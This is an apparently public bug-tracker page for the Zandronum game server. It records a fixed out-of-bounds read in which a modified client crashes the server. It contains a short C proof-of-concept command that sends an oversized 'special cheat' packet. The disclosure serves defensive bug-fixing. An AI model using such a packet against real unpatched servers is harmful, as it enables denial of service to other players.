Zandronum Chat on our Discord Server Get the latest version: 3.1
Source Code

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0002694Zandronum[All Projects] Bugpublic2016-04-02 22:112018-09-30 22:33
ReporterDusk 
Assigned ToDusk 
PrioritynormalSeverityexploitReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version3.0-beta 
Target Version3.0Fixed in Version 
Summary0002694: Modified client can crash the server using the special cheat
DescriptionThe server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled.
Steps To Reproduce

#include "c_dispatch.h"
CCMD (crashserver)
{
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );

    for ( unsigned int i = 0; i < 10; ++i )
        NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
Attached Filesdiff file icon 2694-fix.diff [^] (621 bytes) 2016-04-02 22:41 [Show Content]

- Relationships
child of 0002620closedDusk the 'special' cheat does not work online 

-  Notes
User avatar (0014647)
Dusk (developer)
2016-04-02 22:39

I've fixed this, but won't push till Monday since there's a testing event coming tomorrow. Diff attached.
User avatar (0014843)
Edward-san (developer)
2016-05-08 21:00

Added with changeset:'https://bitbucket.org/Torr_Samaho/zandronum/commits/b63775a6dd289626e3ac75aee8f6e68f0dd793a8 [^]' .

Issue Community Support
This issue is already marked as resolved.
If you feel that is not the case, please reopen it and explain why.
Supporters: No one explicitly supports this issue yet.
Opponents: No one explicitly opposes this issue yet.

- Issue History
Date Modified Username Field Change
2016-04-02 22:11 Dusk New Issue
2016-04-02 22:12 Dusk Summary Client can crash the server using the special cheat => Modified client can crash the server using the special cheat
2016-04-02 22:19 Dusk Relationship added child of 0002620
2016-04-02 22:39 Dusk Note Added: 0014647
2016-04-02 22:40 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk File Deleted: 2694-fix.diff
2016-04-02 22:41 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk Assigned To => Dusk
2016-04-02 22:41 Dusk Status new => needs review
2016-05-08 21:00 Edward-san Note Added: 0014843
2016-05-08 21:00 Edward-san Status needs review => needs testing
2016-12-24 22:43 Dusk Target Version => 3.0
2017-02-17 10:09 Dusk Status needs testing => resolved
2017-02-17 10:09 Dusk Resolution open => fixed
2017-02-17 10:09 Dusk View Status private => public
2018-09-30 22:33 Blzut3 Status resolved => closed






Questions or other issues? Contact Us.

Links


Copyright © 2000 - 2024 MantisBT Team
Powered by Mantis Bugtracker